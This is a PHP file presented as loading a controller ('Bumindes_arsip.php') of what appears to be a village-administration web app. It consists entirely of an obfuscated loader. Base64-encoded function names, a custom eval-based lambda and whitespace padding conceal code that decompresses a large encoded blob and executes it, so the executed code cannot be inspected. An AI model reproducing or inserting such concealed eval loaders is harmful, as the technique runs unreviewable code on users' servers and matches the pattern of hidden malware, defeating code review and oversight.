<?php 
        $__='printf';$_='Loading donjo-app/controllers/Bumindes_arsip.php';
        



































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


































































































































































































































































                                                                                                                                                                                                                     $________;
